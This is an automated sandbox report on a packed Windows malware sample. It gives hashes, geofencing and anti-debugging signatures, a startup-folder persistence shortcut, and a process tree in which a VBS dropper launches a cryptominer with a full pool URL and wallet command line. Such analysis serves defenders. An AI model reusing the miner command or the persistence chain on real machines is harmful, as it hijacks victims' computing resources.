Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
31/05/2024, 15:06
Static task
static1
Behavioral task
behavioral1
Sample
876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe
Resource
win10v2004-20240508-en
General
-
Target
876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe
-
Size
1.6MB
-
MD5
876cf2c8f925c3a8a29d254f34ca1d0d
-
SHA1
b6e4acdc4fa514a9d879878249c223e946114e09
-
SHA256
a65d885d904cc0f2d2452d4c2b8c58db5eb04153e45a3ce081d3f50d767e5e22
-
SHA512
25fce95c3722da3bc992762f2ba79db2e966870c0b11cc4701a7e1fc66f9c75da34f8521e70e01e518141edb6949c6a1a754520a03292f857629825fdefa78ee
-
SSDEEP
49152:Ae6wBw10h/e9uUdu7XUIvoMoSzxWTnHGQvPM/9Dft:AeD9WuvtY7pHMD
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation 876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk 876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe -
Executes dropped EXE 1 IoCs
pid Process 3544 csrs.exe -
resource yara_rule behavioral2/files/0x0007000000023401-9.dat vmprotect behavioral2/memory/3544-11-0x0000000000090000-0x00000000003FB000-memory.dmp vmprotect behavioral2/memory/3544-12-0x0000000000090000-0x00000000003FB000-memory.dmp vmprotect behavioral2/memory/3544-31-0x0000000000090000-0x00000000003FB000-memory.dmp vmprotect -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 3544 csrs.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings 876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeLockMemoryPrivilege 3544 csrs.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 4568 wrote to memory of 2928 4568 876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe 83 PID 4568 wrote to memory of 2928 4568 876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe 83 PID 4568 wrote to memory of 2928 4568 876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe 83 PID 2928 wrote to memory of 3544 2928 WScript.exe 92 PID 2928 wrote to memory of 3544 2928 WScript.exe 92 PID 2928 wrote to memory of 3544 2928 WScript.exe 92
Processes
-
C:\Users\Admin\AppData\Local\Temp\876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Drops startup file
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\svchost.VBS"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2928 -
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 19e8n98DfHt3un2eEQuYCZGron5z3dBZiZ -p x -t 103⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3544
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD564f8f6eac3dc0c9fedff18d20aab3e44
SHA12a8a993f40c3feb053cf80cffb630315cd242342
SHA256ff91c76c8c2e0e3d30431e522c07e27295376b565480748d1e0e7f2641af6d3e
SHA5125d6810fb3b56eab08617338cb21791322a5aeb0f517b59bd8c7bbd2ad06f01903c551fa07dd35c252334d70eadebf24239669691eb10bf4b77d4ef23e9688116
-
Filesize
3KB
MD5de7c2fd6410b41fe9dc691128bda00f0
SHA162412cf8b84f29be852cdf710b694af924f4345c
SHA256fad402a54293e23785c2f44cdb22dc86c8d60d83a574bc53ce56442ad14fd68d
SHA512df625533f850a2c97f6464540d03b632312472415eb590099ea8a63a4769f8efac70b5c035ad32b3897259a4cfb2580704b8d600997a9af53c772845a96c6e0f
-
Filesize
4KB
MD53217480c90b0366a3621c70ee2f50585
SHA160f759c3fc66312dd7a596732a34920e2d600874
SHA256f437e4d76784bb3281e7f03e15d3154ecc9429cc2b801272f662a4521f1ea78d
SHA512a9f6d57db9de37b876ae7e2e629e4abe7bd141999f0bcd4976411ec0bd9170b8c92b8c0b8b8aa8445bafbecf4ac201bc498321bf196c38095a9834bdad9663a7
-
Filesize
1.4MB
MD5e3427d9f439aebefa3d9c299e2a94af3
SHA1ffff4672790378677ec30d3634fc593c10dfd37e
SHA2567374051e75ae97ba687cd153927faccd21fcdcc0b41a42867d38ac62064f6aba
SHA512a9ffc1a3436a26b162b8933f628b6f5014b7cd5678625a479ddf6ad0ff32a50b916c2041265fa0fc6cc99fcf0c63e30eb4811cf8099cc0baf2b718647ce4160b
-
Filesize
1KB
MD596d540f4b7c1b7074e5f135432a3592d
SHA1c380a1b024dcb58296a30c258d294ca3249d6f08
SHA25644af45c732ab1f051e9c849086af7384c78fe7faaa2049c844b3b014a5af5e70
SHA512d3589dff318c752a3913fd489f3a1c6b6e1898f051d97cb6e546d3d4a8339732992705eaa1af27d29e8c41eb7a229ea597df406be5a312d2070226f503be514b